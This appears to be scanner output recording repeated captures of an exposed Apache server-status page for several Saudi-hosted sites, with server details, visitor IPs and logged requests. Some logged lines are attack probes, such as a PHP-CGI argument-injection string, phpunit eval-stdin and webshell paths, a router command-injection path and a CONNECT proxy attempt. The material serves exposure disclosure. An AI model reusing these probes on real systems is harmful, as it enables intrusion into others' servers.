      157.245.102.17http/1.1albayan.edu.sa:443GET /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_s
      
      0-5154470/56/3619_
      8.3270419543570.09.16251.25
      52.167.144.203http/1.1albayan.edu.sa:443GET /web/38.html2 HTTP/1.1
      
      0-5154470/94/3653_
      8.1198905418590.02.64364.99
      103.231.89.229http/1.13dvi.com:80GET /admin/server/php/ HTTP/1.1
      
      0-5154470/39/3368_
      8.283954910287930.02.36470.14
      66.249.66.82http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1485&l_n=1&page=1 HTTP
      
      0-5154470/36/3764_
      8.119795215087980.02.92330.13
      18.201.142.51http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      1-57910/8/3560_
      1.3623635762900.00.28450.83
      172.69.130.34http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-57914/8/3121W
      0.7515690812876147.10.16371.15
      36.182.48.166http/1.1jawad.com.sa:443GET /%D9%83%D8%AA%D8%A7%D9%84%D9%88%D8%AC%20%D9%84%D8%AF%D8%A7%
      
      1-57910/9/3495_
      1.33250122627261780.00.24284.23
      188.132.11.156http/1.1sibaq-alhuruf.thenewjeddah.com:GET /5bmFXNXdZV2RsWm05eWVtVmtDZz09 HTTP/1.1
      
      1-57910/6/3408_
      1.34169418070720.00.03195.68
      172.68.97.139http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      1-57910/6/3581_
      1.081169207976060.00.17260.77
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-57910/9/3461_
      1.101076619796880.00.12393.73
      114.119.139.123http/1.13dvi.com:443GET /images/folio/thumbs/356446288991719.jpg HTTP/1.1
      
      1-57910/6/3483_
      1.091145011761330.00.17858.93
      45.159.229.175http/1.1albayan.edu.sa:80GET /wp-includes/ HTTP/1.1
      
      1-57910/6/3171_
      1.10111226117840.00.02292.77
      138.201.201.48http/1.1
      Found on 2024-06-21 00:44
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7d6e899d4

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 19:19:22 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 15 hours 16 minutes 18 seconds
      Server load: 0.01 0.04 0.05
      Total accesses: 642668 - Total Traffic: 73.7 GB - Total Duration: 1645546623
      CPU Usage: u341.11 s21 cu2824.08 cs599.98 - .574% CPU load
      .974 requests/sec - 117.2 kB/second - 120.3 kB/request - 2560.49 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 212 idle workers
      ______K_____________________K__________K________________________
      _KW_____________________K_____________________________K_________
      __________K_________________W_____________K_________K________W__
      ________.........................___________K_____________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5262710/18/2773_
      2.621502302429180.03.49301.48
      35.187.132.162http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/simple-file-list/js/ee-head.js?ver=6.5.
      
      0-5262710/15/2426_
      2.797318365090.00.19275.61
      206.81.24.227http/1.1trynidaa.com:443GET /.DS_Store HTTP/1.1
      
      0-5262710/20/2481_
      2.6498033128310.01.42342.72
      35.187.132.2http/1.1albayan.edu.sa:80HEAD /web.html HTTP/1.1
      
      0-5262710/32/2588_
      2.488443729070.00.39211.85
      206.81.24.227http/1.1
      
      0-5262710/23/2755_
      2.6660365643990.01.47340.92
      35.88.103.9http/1.1jilani.com.sa:443GET /api/v0.1/app/get-info-list-with-type?type=6 HTTP/1.1
      
      0-5262710/14/2411_
      2.6115033482150.00.31349.30
      35.187.132.162http/1.1sulaimaniya.edu.sa:443HEAD /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
      
      0-5262711/11/2721K
      2.790245167466.60.19252.34
      162.158.110.12http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5262710/11/2825_
      2.532212561018871510.01.54230.34
      185.80.143.7http/1.1albayan.edu.sa:443GET /imgweb/cemecal.pdf HTTP/1.1
      
      0-5262710/69/2552_
      2.666633583140.00.61159.79
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-5262710/14/2514_
      2.7963614075650.00.22543.18
      206.81.24.227http/1.1trynidaa.com:443GET /server HTTP/1.1
      
      0-5262710/10/2739_
      2.3315067187990.00.76268.81
      107.178.231.243http/1.1
      
      0-5262710/16/2665_
      2.522361439426410.00.40343.58
      e154df25ea.scan.leakix.orghttp/1.1dash.thenewjeddah.com:443GET /server-status HTTP/1.1
      
      0-5262710/19/2465_
      2.64100090730800.00.44168.18
      35.187.132.3http/1.1albayan.edu.sa:80HEAD / HTTP/1.1
      
      0-5262710/34/2620_
      2.67572015371010.00.92187.96
      41.142.105.130http/1.1jawad.com.sa:80GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.
      
      0-5262710/24/2822_
      2.5323839162510.00.34515.28
      138.68.82.23http/1.1dash.thenewjeddah.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-5262710/12/2836_
      2.408616621190.00.78286.56
      107.178.236.26http/1.1
      
      0-5262710/19/2667_
      2.531631422877310.01.26223.85
      35.187.132.176http/1.1sulaimaniya.edu.sa:80HEAD / HTTP/1.1
      
      0-5262710/32/2512_
      2.6115026333750.00.98322.09
      35.187.132.160http/1.1sulaimaniya.edu.sa:443HEAD /wp-content/plugins/blog-designer-pack/assets/js/bdp-publi
      
      0-5262710/15/2539_
      2.649004702060.02.17216.23
      3.16.50.8http/1.1albayan.edu.sa:80GET /'http://albayan.edu.sa/web.html' HTTP/1.1
      
      0-5262710/14/2166_
      2.641412354745220.00.47300.74
      66.249.66.34http/1.1wahjcm.com:443GET /courses/single/24 HTTP/1.1
      
      0-5262710/19/2396_
      2.65841845623380.01.34299.49
      51.211.98.231http/1.1garndhabi.org:80GET /uploads/cities/152024232918303.jpg HTTP/1.1
      
      0-5262710/24/2579_
      2.784526675630.00.92183.20
      51.253.160.28http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2016/02/sample-school-sketch-elements-4
      
      0-5262710/34/2420_
      2.5915223246200.01.73261.84
      34.174.192.151http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/08/IMG-20210824-WA0115-500x344.jpg
      
      0-5262710/16/2423_
      2.783218841070.00.97421.54
      18.216.221.196http/1.1albayan.edu.sa:443GET /'http:/albayan.edu.sa/web.html' HTTP/1.1
      
      0-5262710/24/2621_
      2.725139846490.00.84219.81
      51.253.160.28http/1.1sulaimaniya.edu.sa:443GET /wp-content/themes/kids-world/fonts/fontawesome-webfont.wof
      
      1-5267090/29/2910_
      3.481511634272760.00.93402.52
      35.187.132.162http/1.1sulaimaniya.edu.sa:443HEAD /wp-content/plugins/js_composer/assets/js/dist/js_composer
      
      1-5267090/29/2601_
      3.694526516520.01.11321.28
      51.253.160.28http/1.1sulaimaniya.edu.sa:443GET /wp-content/themes/kids-world/demo/images/school-sketch-ele
      
      1-5267090/16/2789_
      3.17866626500000.00.22246.69
      107.178.236.26http/1.1
      
      1-5267091/65/2711K
      3.70016657450.91.00159.56
      172.70.250.98http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-5267090/68/2719_
      3.5012606255910.00.11158.05
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-5267090/12/2634_
      3.216067000200.00.26285.40
      35.88.103.9http/1.1
      
      1-5267090/27/2794_
      3.392141110061030.00.63308.04
      172.70.250.24http/1.1adyar.com.sa:80GET / HTTP/1.1
      
      1-5267090/12/2526_
      3.6928365037840.00.08243.91
      51.211.98.231http/1.1garndhabi.org:80GET /api/v1/contact/managers HTTP/1.1
      
      1-5267090/16/2824_
      3
      Found on 2024-06-18 16:19
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df72df88afa

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 10:34:23 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 6 hours 31 minutes 18 seconds
      Server load: 0.00 0.01 0.05
      Total accesses: 611832 - Total Traffic: 71.4 GB - Total Duration: 1634046758
      CPU Usage: u386.62 s29.62 cu2624.04 cs564.81 - .574% CPU load
      .974 requests/sec - 119.2 kB/second - 122.4 kB/request - 2670.74 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 241 idle workers
      __K_____________________________________________________________
      _____K___________________K______________________K_______________
      ____W__________K__________________K___________________________K_
      ________..................................................______
      ______K_____________________________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-532920/153/2666_
      18.11271299790040.04.03268.10
      112.235.75.78http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      0-532920/115/2259_
      17.93694568216590.08.25269.03
      94.156.66.180http/1.1daris.live:80GET /xxc.php HTTP/1.1
      
      0-532922/245/2304K
      18.130232846521.63.60336.35
      172.70.46.143http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-532920/203/2466_
      17.9836623470950.029.03203.61
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-532920/81/2562_
      17.87255371380.05.75336.13
      160.157.104.218http/1.1
      
      0-532920/261/2309_
      18.108033310290.05.12331.88
      160.157.104.218http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-532920/153/2575_
      18.01206194346520.014.50231.87
      162.158.129.39http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-532920/151/2679_
      18.1156193737820.06.39225.09
      172.70.203.147http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-532920/114/2380_
      18.021202293327900.08.61146.28
      66.249.66.33http/1.1akg.sa:443GET /?cokernut-302873-iBdCvpKib/2732555149 HTTP/1.1
      
      0-532920/121/2342_
      17.94639213454640.05.73482.17
      45.93.250.43http/1.1php.we3dvi.com:80CONNECT 109.71.254.64:1337 HTTP/1.1
      
      0-532920/189/2636_
      17.9275127086050.05.02264.19
      139.59.136.184http/1.1abu-helal.com:443GET / HTTP/1.1
      
      0-532920/260/2534_
      17.9275119266150.04.58314.83
      139.59.136.184http/1.1abu-helal.com:443GET /.DS_Store HTTP/1.1
      
      0-532920/155/2248_
      17.964644888561490.04.79163.50
      94.156.66.180http/1.1daris.live:80GET /wp-admin/includes/admin.php HTTP/1.1
      
      0-532920/204/2474_
      17.7165325237310.05.19181.57
      188.166.8.167http/1.1
      
      0-532920/134/2621_
      17.973993948729560.09.44499.28
      66.249.66.82http/1.1albayan.edu.sa:443GET /imgweb/file42/%D8%B1%D9%8A%D8%A7%D8%B6%D9%8A%D8%A7%D8%AA2%
      
      0-532920/240/2687_
      18.00221434570580.05.88271.55
      83.64.154.28http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-532920/95/2491_
      17.94552492665690.02.79218.81
      94.156.66.180http/1.1daris.live:80GET /wp-admin/maint/about.php HTTP/1.1
      
      0-532920/131/2326_
      17.94588776119010.04.93316.17
      94.156.66.180http/1.1daris.live:80GET /wp-content/install.php HTTP/1.1
      
      0-532920/128/2432_
      18.12614421500.04.12211.37
      167.94.146.54http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-532920/150/2042_
      17.93652584524430.04.75292.55
      188.166.8.167http/1.13dvi.com:443GET / HTTP/1.1
      
      0-532920/169/2289_
      17.992842579843857920.08.49273.66
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A7%D8%B
      
      0-532920/194/2462_
      18.069536500430.06.00174.55
      145.82.156.109http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-532920/87/2285_
      17.965113943033250.04.34256.14
      66.249.66.81http/1.1albayan.edu.sa:443GET /imgweb/file42/%D8%B1%D9%8A%D8%A7%D8%B6%D9%8A%D8%A7%D8%AA2%
      
      0-532920/224/2309_
      18.0115648696770.012.71413.42
      45.148.10.174http/1.1php.we3dvi.com:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co
      
      0-532920/282/2508_
      17.92738538959670.03.45213.76
      94.156.66.180http/1.1daris.live:80GET /WSOEnigma.php HTTP/1.1
      
      1-564140/180/2682_
      17.16281634100580.08.35398.49
      112.235.75.78http/1.1jawad.com.sa:80HEAD / HTTP/1.1
      
      1-564140/125/2352_
      16.537511816252100.02.75310.82
      139.59.136.184http/1.1
      
      1-564140/110/2660_
      17.14793625632030.02.88241.83
      160.157.104.218http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      1-564140/239/2484_
      17.0274106353160.05.20149.30
      216.244.66.198http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      1-564140/241/2504_
      17.0931006041020.03.77154.38
      66.249.66.82http/1.1albayan.edu.sa:80GET /imgweb/files41/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A7%D8%
      
      1-564140/159/2504_
      17.0563705665930.07.07252.56
      66.249.66.81http/1.1albayan.edu.sa:80GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D8%AC%D8%AA%D9%85%
      
      1-564140/77/2633_
      17.05562519912980.019.22303.83
      94.156.66.180http/1.1daris.live:80GET /wp-includes/widgets/index.php HTTP/1.1
      
      1-564140/203/2385_
      17.05607524500650.017.15238.03
      94.156.66.180http/1.1daris.live:80GET /wp-includes/certificates/plugins.php HTTP/1.1
      
      1-564140/184/2613<
      Found on 2024-06-18 07:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df76c39a0c2

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 16-Jun-2024 14:48:13 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 10 hours 45 minutes 8 seconds
      Server load: 0.10 0.08 0.06
      Total accesses: 461554 - Total Traffic: 57.1 GB - Total Duration: 1514093905
      CPU Usage: u288.34 s21.6 cu1980.51 cs418.28 - .575% CPU load
      .981 requests/sec - 127.3 kB/second - 129.8 kB/request - 3280.43 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 213 idle workers
      __________K__________________________K_K________________K_______
      _________________K________K_______________K_____________________
      ___________________K_____________________K__________W_K_________
      _________________________K_______...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4218790/126/1956_
      6.945024298997810.00.40215.05
      172.70.203.144http/1.1qr.brunch.ws:443GET /storage/food_image/17162858593789_homemadeicedtea.jpg HTTP
      
      0-4218790/90/1601_
      6.993983295295860.02.31162.27
      172.70.203.139http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      0-4218790/31/1586_
      7.0976257008300.04.15144.17
      193.186.4.53http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-4218790/33/1607_
      6.9450283050340.01.82147.47
      172.70.203.141http/1.1qr.brunch.ws:443GET /storage/food_image/17096788308104_apple.webp HTTP/1.1
      
      0-4218790/30/1794_
      6.8563994881670.00.30297.26
      188.166.108.93http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-4218790/83/1538_
      6.8863812497220.00.60167.84
      188.166.108.93http/1.1albayan.edu.sa:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-4218790/136/1804_
      6.9350243534020.00.91131.16
      172.70.203.134http/1.1qr.brunch.ws:443GET /storage/food_image/17088536517355_imge12175a5596244dd9127e
      
      0-4218790/83/1812_
      7.00376213139630.00.22189.24
      188.114.102.234http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-4218790/74/1550_
      6.886361692772210.07.34106.55
      a7638675e3.scan.leakix.orghttp/1.1albayan.edu.sa:443GET /server-status HTTP/1.1
      
      0-4218790/79/1626_
      6.965021012929020.01.92402.60
      172.70.203.130http/1.1qr.brunch.ws:443GET /storage/food_image/17162860982324_cortado.jpg HTTP/1.1
      
      0-4218791/42/1666K
      7.10024250880.80.89228.27
      172.70.250.149http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-4218790/81/1586_
      6.9842623704640.00.69237.39
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-4218790/48/1640_
      6.66639887737000.01.2387.33
      188.166.108.93http/1.1
      
      0-4218790/32/1561_
      6.97453543896220.03.27144.56
      40.77.167.55http/1.1jawad.com.sa:443GET /en/details/104 HTTP/1.1
      
      0-4218790/126/1831_
      7.03276427993110.00.34441.37
      172.70.203.138http/1.1qr.brunch.ws:443POST /foods/170 HTTP/1.1
      
      0-4218790/78/1705_
      7.1015583130740.01.57180.60
      112.86.225.13http/1.13dvi.com:443GET / HTTP/1.1
      
      0-4218790/24/1686_
      7.02300152233120.00.51159.26
      52.167.144.140http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=232 HTTP/1.1
      
      0-4218790/79/1668_
      6.6855995370620.01.52214.78
      2.89.200.228http/1.1
      
      0-4218790/34/1561_
      7.051603703317500.07.93160.60
      52.167.144.140http/1.1albayan.edu.sa:443GET /imgweb/files39/%D9%86%D8%AA%D8%A7%D8%A6%D8%AC%20%D9%85%D8%
      
      0-4218790/25/1398_
      7.04208513604670.01.03241.52
      5.163.88.27http/1.1albayan.edu.sa:443GET /web/363.html2 HTTP/1.1
      
      0-4218790/29/1596_
      6.9748876843122730.00.30116.36
      172.70.203.139http/1.1qr.brunch.ws:443POST /foods/214 HTTP/1.1
      
      0-4218790/80/1625_
      6.9250215616340.00.62124.22
      172.70.203.152http/1.1qr.brunch.ws:443GET /storage/food_image/17085175482929_whatsappimage20240221at3
      
      0-4218790/127/1609_
      6.8474012505940.00.35166.72
      23.178.112.204http/1.1akgsa.com:80GET /.well-known/acme-challenge/r5tdCUCOg3w08KPucf_lsGCND4-w4Pv
      
      0-4218790/31/1561_
      7.06148467210570.03.45320.98
      172.70.203.139http/1.1qr.brunch.ws:443POST /foods/105 HTTP/1.1
      
      0-4218790/87/1692_
      7.0911728481350.00.64156.31
      104.238.162.143http/1.1php.we3dvi.com:80HEAD /home HTTP/1.1
      
      1-4219070/136/1930_
      7.35207112631211370.02.34319.94
      5.163.88.27http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-4219070/31/1636_
      7.26502103604350.01.05166.34
      172.70.203.149http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      1-4219070/136/1843_
      7.187401625144420.01.60167.48
      23.178.112.200http/1.1akgsa.com:80GET /.well-known/acme-challenge/8gBkIRKXc9BwnqiOUW3paChfxYAzGeX
      
      1-4219070/89/1521_
      7.2750283536980.010.1585.82
      172.70.203.150http/1.1qr.brunch.ws:443GET /storage/food_image/17162861459998_latte.jpg HTTP/1.1
      
      1-4219070/26/1811_
      7.36160625612650.00.78115.82
      172.70.203.130http/1.1qr.brunch.ws:443POST /foods/65 HTTP/1.1
      
      1-4219070/150/1739_
      7.2062403972350.00.36175.25
      52.167.144.140http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/05_70263.pdf HTTP/1.1
      
      1-4219070/178/2095_
      7.33300705926980.02.30249.56
      172.70.203.138http/1.1qr.brunch.ws:443POST /foods/214 HTTP/1.1
      
      1-4219070/81/1685_
      7.2350243709660.01.65188.39
      172.70.203.140http/1.1qr.brunch.ws:443GET /storage/food_image/1716286909390
      Found on 2024-06-16 11:48
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df77b4ce54f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 16-Jun-2024 13:46:01 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 9 hours 42 minutes 56 seconds
      Server load: 0.05 0.03 0.05
      Total accesses: 457530 - Total Traffic: 56.8 GB - Total Duration: 1513035296
      CPU Usage: u271.91 s18.79 cu1980.51 cs418.28 - .576% CPU load
      .98 requests/sec - 127.6 kB/second - 130.3 kB/request - 3306.96 ms/request
      7 requests currently being processed, 0 workers gracefully restarting, 193 idle workers
      _______________K________________________K_______________K_______
      ____________________________K________________W__________________
      _______________K______________________________________K_________
      ________........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4218790/120/1950_
      5.0524961298995220.00.38215.03
      163.172.107.233http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-4218790/24/1535_
      4.952771425231480.00.75160.71
      162.158.130.44http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      0-4218790/22/1577_
      4.9127836752160.01.08141.11
      172.71.114.85http/1.1qr.brunch.ws:443GET /storage/food_image/17096783054077_trio.webp HTTP/1.1
      
      0-4218790/24/1598_
      5.06230193035270.01.77147.43
      172.71.114.23http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-4218790/24/1788_
      5.0426844880610.00.27297.23
      172.71.114.219http/1.1qr.brunch.ws:443GET /storage/logo/17088648896946_group8.png HTTP/1.1
      
      0-4218790/74/1529_
      5.0327142488380.00.28167.52
      172.71.114.88http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      0-4218790/80/1748_
      5.0619613528850.00.86131.11
      167.71.81.114http/1.1durratalkhamis.alnwisher.com:80GET /.vscode/sftp.json HTTP/1.1
      
      0-4218790/76/1805_
      4.96276223138910.00.18189.20
      162.158.129.140http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-4218790/69/1545_
      5.0426602766910.07.16106.37
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-4218790/22/1569_
      5.09192612913830.01.03401.71
      216.244.66.198http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1539&t=216.244.66.198&c=5 HTT
      
      0-4218790/34/1658_
      5.0227174241870.00.36227.74
      172.71.114.61http/1.1qr.brunch.ws:443GET /storage/food_image/17162865595793_pumpkinlatte.jpg HTTP/1.
      
      0-4218790/25/1530_
      5.1260193697260.00.43237.13
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-4218790/33/1625_
      4.93277687736040.00.6786.76
      172.71.114.200http/1.1qr.brunch.ws:443GET /storage/food_image/17096771907248_minibeefburger.webp HTTP
      
      0-4218790/27/1556_
      5.10124143894290.03.22144.51
      194.163.145.202http/1.1jawad.com.sa:443GET /wp-includes/widgets/include.php HTTP/1.1
      
      0-4218790/119/1824_
      5.0027127989910.00.24441.26
      172.71.115.66http/1.1qr.brunch.ws:443GET /storage/food_image/17162861147551_hotchocolat.jpg HTTP/1.1
      
      0-4218791/21/1648K
